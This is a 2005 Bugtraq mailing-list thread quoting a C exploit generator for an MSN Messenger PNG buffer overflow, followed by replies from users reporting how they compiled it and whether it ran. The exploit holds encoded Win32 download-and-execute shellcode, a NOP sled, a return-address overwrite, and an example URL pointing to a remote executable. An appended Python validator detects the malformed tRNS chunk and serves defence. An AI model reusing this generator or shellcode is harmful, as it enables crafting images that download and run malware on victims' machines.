RE: MSN Messenger PNG Image Buffer Overflow Download Shellcoded Exploit

From: Color Inc. (neoexitus_at_hotmail.com)
Date: 02/10/05

    To: bugtraq@securityfocus.com
    Date: Thu, 10 Feb 2005 19:24:06 +0000
    
    

    I compiled the code without having to change line 124, only had 2 warnings,
    which were not critical. The vuln.png file was generated, when I put it as
    my Display Picture I get:
    "I'm compiled with VC6 and just 1024 bytes big :)"
    then MSN Messenger crashes.

    I'm using MSN Messenger 6.2.0137

    >From: "Andrew Hunter" <andiroohunter@msn.com>
    >To: bugtraq@securityfocus.com
    >Subject: RE: MSN Messenger PNG Image Buffer Overflow Download Shellcoded
    >Exploit
    >Date: Wed, 09 Feb 2005 19:51:26 +0000
    >
    >I had problems getting your code to compile, a few modifications were
    >needed!
    >I did get it to compile in MS VC++, and in Dev C++
    >
    >You need to make the following adjustments.
    >
    >Line 124:
    >newshellcode = new char[sizeof(shellcode)+strlen(web)+1];
    >
    >Change it to the following:
    >newshellcode = malloc((sizeof(shellcode)+strlen(web)+1));
    >
    >
    >That is how I got it to successfully compile and make vuln.png
    >
    >Unfortunately MSN would let me load the .png as my display picture? I am
    >using MSN 7 so that is probably why, I will downgrade to MSN 6 and try
    >again.
    >
    >>From: ATmaCA ATmaCA <atmaca@atmacasoft.com>
    >>To: bugtraq@securityfocus.com
    >>Subject: MSN Messenger PNG Image Buffer Overflow Download Shellcoded
    >>Exploit
    >>Date: 9 Feb 2005 14:06:29 -0000
    >>MIME-Version: 1.0
    >>Received: from [205.206.231.27] ([205.206.231.27]) by mc7-f27.hotmail.com
    >>with Microsoft SMTPSVC(6.0.3790.211); Wed, 9 Feb 2005 08:55:46 -0800
    >>Received: from no.name.available by [205.206.231.27] via smtpd
    >>(for [65.54.253.99] [65.54.253.99]) with ESMTP; Wed, 9 Feb 2005 08:55:47
    >>-0800
    >>Received: from lists2.securityfocus.com (lists2.securityfocus.com
    >>[205.206.231.20])by outgoing3.securityfocus.com (Postfix) with QMQPid
    >>93494236F46; Wed, 9 Feb 2005 09:39:39 -0700 (MST)
    >>Received: (qmail 20604 invoked from network); 9 Feb 2005 06:20:36 -0000
    >>X-Message-Info: JGTYoYF78jGdL+F1rUGY1q5Vec9LnW/lXD+aujlifHY=
    >>Mailing-List: contact bugtraq-help@securityfocus.com; run by ezmlm
    >>Precedence: bulk
    >>List-Id: <bugtraq.list-id.securityfocus.com>
    >>List-Post: <mailto:bugtraq@securityfocus.com>
    >>List-Help: <mailto:bugtraq-help@securityfocus.com>
    >>List-Unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
    >>List-Subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
    >>Delivered-To: mailing list bugtraq@securityfocus.com
    >>Delivered-To: moderator for bugtraq@securityfocus.com
    >>X-Mailer: MIME-tools 5.411 (Entity 5.404)
    >>Return-Path: bugtraq-return-18024-andiroohunter=msn.com@securityfocus.com
    >>X-OriginalArrivalTime: 09 Feb 2005 16:55:46.0679 (UTC)
    >>FILETIME=[334BF070:01C50EC8]
    >>
    >>
    >>
    >>/*
    >>*
    >>* MSN Messenger PNG Image Buffer Overflow Download Shellcoded Exploit
    >>* Bug discoveried by Core Security Technologies (www.coresecurity.com)
    >>* Exploit coded By ATmaCA
    >>* Copyright 2002-2005 AtmacaSoft Inc. All Rights Reserved.
    >>* Web: http://www.atmacasoft.com
    >>* E-Mail: atmaca@icqmail.com
    >>* Credit to kozan and delikon
    >>* Usage:exploit <OutputPath> <Url>
    >>*
    >>*/
    >>
    >>/*
    >>*
    >>* Tested with MSN Messenger 6.2.0137
    >>* This vulnerability can be exploited on Windows 2000 (all service packs)
    >>* and Windows XP (all service packs) that run vulnerable
    >>* clients of MSN Messenger.
    >>*
    >>*/
    >>
    >>/*
    >>*
    >>* After creating vuln png image, open
    >>* MSN Messenger and select it as your display picture in
    >>* "Tools->Change Display Picture".
    >>*
    >>*/
    >>
    >>#include <stdio.h>
    >>#include <stdlib.h>
    >>#include <conio.h>
    >>#include <string.h>
    >>
    >>
    >>#ifdef __BORLANDC__
    >> #include <mem.h>
    >>#endif
    >>
    >>#define NOP 0x90
    >>
    >>char png_header[] =
    >>"\x89\x50\x4E\x47\x0D\x0A\x1A\x0A\x00\x00\x00\x0D\x49\x48\x44\x52"
    >>"\x00\x00\x00\x40\x00\x00\x00\x40\x08\x03\x00\x00\x00\x9D\xB7\x81"
    >>"\xEC\x00\x00\x01\xB9\x74\x52\x4E\x53";
    >>
    >>char pngeof[] = "\x90\x90\x90\x59\xE8\x47\xFE\xFF\xFF";
    >>
    >>/* Generic win32 http download shellcode
    >> xored with 0x1d by delikon (http://delikon.de/) */
    >>char shellcode[] = "\xEB"
    >>"\x10\x58\x31\xC9\x66\x81\xE9\x22\xFF\x80\x30\x1D\x40\xE2\xFA\xEB\x05\xE8\xEB\xFF"
    >>"\xFF\xFF\xF4\xD1\x1D\x1D\x1D\x42\xF5\x4B\x1D\x1D\x1D\x94\xDE\x4D\x75\x93\x53\x13"
    >>"\xF1\xF5\x7D\x1D\x1D\x1D\x2C\xD4\x7B\xA4\x72\x73\x4C\x75\x68\x6F\x71\x70\x49\xE2"
    >>"\xCD\x4D\x75\x2B\x07\x32\x6D\xF5\x5B\x1D\x1D\x1D\x2C\xD4\x4C\x4C\x90\x2A\x4B\x90"
    >>"\x6A\x15\x4B\x4C\xE2\xCD\x4E\x75\x85\xE3\x97\x13\xF5\x30\x1D\x1D\x1D\x4C\x4A\xE2"
    >>"\xCD\x2C\xD4\x54\xFF\xE3\x4E\x75\x63\xC5\xFF\x6E\xF5\x04\x1D\x1D\x1D\xE2\xCD\x48"
    >>"\x4B\x79\xBC\x2D\x1D\x1D\x1D\x96\x5D\x11\x96\x6D\x01\xB0\x96\x75\x15\x94\xF5\x43"
    >>"\x40\xDE\x4E\x48\x4B\x4A\x96\x71\x39\x05\x96\x58\x21\x96\x49\x18\x65\x1C\xF7\x96"
    >>"\x57\x05\x96\x47\x3D\x1C\xF6\xFE\x28\x54\x96\x29\x96\x1C\xF3\x2C\xE2\xE1\x2C\xDD"
    >>"\xB1\x25\xFD\x69\x1A\xDC\xD2\x10\x1C\xDA\xF6\xEF\x26\x61\x39\x09\x68\xFC\x96\x47"
    >>"\x39\x1C\xF6\x7B\x96\x11\x56\x96\x47\x01\x1C\xF6\x96\x19\x96\x1C\xF5\xF4\x1F\x1D"
    >>"\x1D\x1D\x2C\xDD\x94\xF7\x42\x43\x40\x46\xDE\xF5\x32\xE2\xE2\xE2\x70\x75\x75\x33"
    >>"\x78\x65\x78\x1D";
    >>
    >>FILE *di;
    >>int i = 0;
    >>short int weblength;
    >>char *web;
    >>char *pointer = NULL;
    >>char *newshellcode;
    >>
    >>/*xor cryptor*/
    >>char *Sifrele(char *Name1)
    >>{
    >> char *Name=Name1;
    >> char xor=0x1d;
    >> int Size=strlen(Name);
    >> for(i=0;i<Size;i++)
    >> Name[i]=Name[i]^xor;
    >> return Name;
    >>}
    >>
    >>
    >>void main(int argc, char *argv[])
    >>{
    >>
    >> if (argc < 3)
    >> {
    >> printf("MSN Messenger PNG Image Buffer Overflow Download
    >>Shellcoded Exploit\n");
    >> printf("Bug discoveried by Core Security Technologies
    >>(www.coresecurity.com)\n");
    >> printf("Exploit coded By ATmaCA\n");
    >> printf("Copyright 2002-2005 AtmacaSoft Inc. All Rights
    >>Reserved.\n");
    >> printf("Web: http://www.atmacasoft.com\n");
    >> printf("E-Mail: atmaca@icqmail.com\n");
    >> printf("Credit to kozan and delikon\n\n");
    >> printf("\tUsage:exploit <OutputPath> <Url>\n");
    >> printf("\tExample:exploit vuln.png
    >>http://www.atmacasoft.com/exp/msg.exe\n");
    >>
    >> return;
    >> }
    >>
    >>
    >> web = argv[2];
    >>
    >>
    >> if( (di=fopen(argv[1],"wb")) == NULL )
    >> {
    >> printf("Error opening file!\n");
    >> return;
    >> }
    >> for(i=0;i<sizeof(png_header)-1;i++)
    >> fputc(png_header[i],di);
    >>
    >> /*stuff in a couple of NOPs*/
    >> for(i=0;i<99;i++)
    >> fputc(NOP,di);
    >>
    >> weblength=(short int)0xff22;
    >> pointer=strstr(shellcode,"\x22\xff");
    >> weblength-=strlen(web)+1;
    >> memcpy(pointer,&weblength,2);
    >> newshellcode = new char[sizeof(shellcode)+strlen(web)+1];
    >> strcpy(newshellcode,shellcode);
    >> strcat(newshellcode,Sifrele(web));
    >> strcat(newshellcode,"\x1d");
    >>
    >> //shell code
    >> for(i=0;i<strlen(newshellcode);i++)
    >> fputc(newshellcode[i],di);
    >>
    >>
    >> for(i=0;i<(83-strlen(web));i++) //NOPs
    >> fputc(NOP,di);
    >>
    >> /*Overwriting the return address (EIP)*/
    >> /*0x005E0547 - ret */
    >> fputc(0x47,di);
    >> fputc(0x05,di);
    >> fputc(0x5e,di);
    >> fputc(0x00,di);
    >>
    >> for(i=0;i<sizeof(pngeof)-1;i++)
    >> fputc(pngeof[i],di);
    >>
    >> printf("Vulnarable png file %s has been generated!\n",argv[1]);
    >>
    >> fclose(di);
    >>}
    >>
    >
    >
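From a defender's side, the file the posted generator writes can be recognised from its chunk layout alone: the `png_header[]` bytes quoted above declare a 64x64 palette (colour type 3) image and then a tRNS chunk of length 0x000001B9, i.e. 441 bytes, while the PNG specification allows a palette image's tRNS chunk at most one byte per PLTE entry, and never more than 256. The validator below is an added example written for this page; it is not code from the thread or from any of its posters. It re-uses the quoted header bytes, appends constructed filler in place of a payload, and checks every chunk's declared length, CRC and ordering against those limits; a constructed well-formed palette image serves as the negative control.

```python
import struct
import zlib

PNG_SIGNATURE = b"\x89PNG\r\n\x1a\n"
MAX_PALETTE_ENTRIES = 256

# The first bytes written by the posted generator (its png_header[] array),
# copied from the thread: signature, a 13-byte IHDR (64x64, bit depth 8,
# colour type 3 = palette), the IHDR CRC, then a chunk length of
# 0x000001B9 = 441 bytes for a tRNS chunk.
POSTED_HEADER = (
    b"\x89\x50\x4E\x47\x0D\x0A\x1A\x0A\x00\x00\x00\x0D\x49\x48\x44\x52"
    b"\x00\x00\x00\x40\x00\x00\x00\x40\x08\x03\x00\x00\x00\x9D\xB7\x81"
    b"\xEC\x00\x00\x01\xB9\x74\x52\x4E\x53"
)

# Constructed sample: the posted header followed by 441 filler bytes and a
# dummy CRC, standing in for whatever a generator would place in the chunk.
MALFORMED_SAMPLE = POSTED_HEADER + b"\x90" * 441 + b"\x00" * 4


def _chunk(ctype, body):
    """Build a well-formed chunk: length, type, data, CRC over type + data."""
    return (struct.pack(">I", len(body)) + ctype + body
            + struct.pack(">I", zlib.crc32(ctype + body) & 0xFFFFFFFF))


# Constructed well-formed 64x64 palette image: 3-entry PLTE, matching
# 3-byte tRNS, one IDAT of 64 rows (filter byte + 64 indices each), IEND.
GOOD_SAMPLE = (
    PNG_SIGNATURE
    + _chunk(b"IHDR", struct.pack(">IIBBBBB", 64, 64, 8, 3, 0, 0, 0))
    + _chunk(b"PLTE", b"\xff\x00\x00\x00\xff\x00\x00\x00\xff")
    + _chunk(b"tRNS", b"\xff\x80\x00")
    + _chunk(b"IDAT", zlib.compress(b"\x00" * 65 * 64))
    + _chunk(b"IEND", b"")
)


def check_png(data):
    """Return a list of structural findings for a PNG byte string.
    An empty list means every chunk respected the size and ordering rules
    checked here (signature, IHDR first, CRCs, PLTE/tRNS limits, IEND)."""
    findings = []
    if not data.startswith(PNG_SIGNATURE):
        return ["missing PNG signature"]
    pos = len(PNG_SIGNATURE)
    colour_type = None
    palette_entries = None
    first_chunk = True
    saw_iend = False
    while pos + 8 <= len(data):
        length, ctype = struct.unpack(">I4s", data[pos:pos + 8])
        name = ctype.decode("latin-1")
        body = data[pos + 8:pos + 8 + length]
        if len(body) < length:
            # Declared length runs past the end of the file: truncated or lying.
            findings.append(f"{name} declares {length} bytes but only {len(body)} remain")
            break
        crc_bytes = data[pos + 8 + length:pos + 12 + length]
        if (len(crc_bytes) < 4
                or struct.unpack(">I", crc_bytes)[0] != zlib.crc32(ctype + body) & 0xFFFFFFFF):
            findings.append(f"{name} CRC mismatch")
        if first_chunk:
            first_chunk = False
            if ctype != b"IHDR" or length != 13:
                findings.append("first chunk is not a 13-byte IHDR")
            else:
                colour_type = body[9]  # IHDR: width(4) height(4) depth(1) colour type(1) ...
        elif ctype == b"PLTE":
            if length % 3 or length > 3 * MAX_PALETTE_ENTRIES:
                findings.append(f"PLTE length {length} is not a valid palette size")
            else:
                palette_entries = length // 3
        elif ctype == b"tRNS":
            if colour_type == 3:
                # Palette images: one alpha byte per PLTE entry, PLTE must come first.
                if palette_entries is None:
                    findings.append("tRNS appears before PLTE")
                limit = palette_entries if palette_entries is not None else MAX_PALETTE_ENTRIES
                if length > limit:
                    findings.append(
                        f"tRNS declares {length} entries but a palette image allows at most {limit}")
            elif colour_type in (0, 2) and length != {0: 2, 2: 6}[colour_type]:
                findings.append(f"tRNS length {length} is wrong for colour type {colour_type}")
        elif ctype == b"IEND":
            saw_iend = True
            break
        pos += 12 + length
    if not saw_iend:
        findings.append("no IEND chunk")
    return findings


if __name__ == "__main__":
    for label, sample in (("posted header + filler", MALFORMED_SAMPLE), ("well-formed", GOOD_SAMPLE)):
        print(label, "->", check_png(sample) or "no findings")
```

Run stand-alone, the script reports the oversized and out-of-order tRNS chunk (plus its bad CRC and the missing IEND) for the constructed malformed sample and nothing for the well-formed one. The same check is cheap enough to run on display pictures or attachments at a gateway before any image library touches them; the point is to reject a chunk whose declared length exceeds what the declared colour type and palette can possibly need, rather than trusting the length field.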

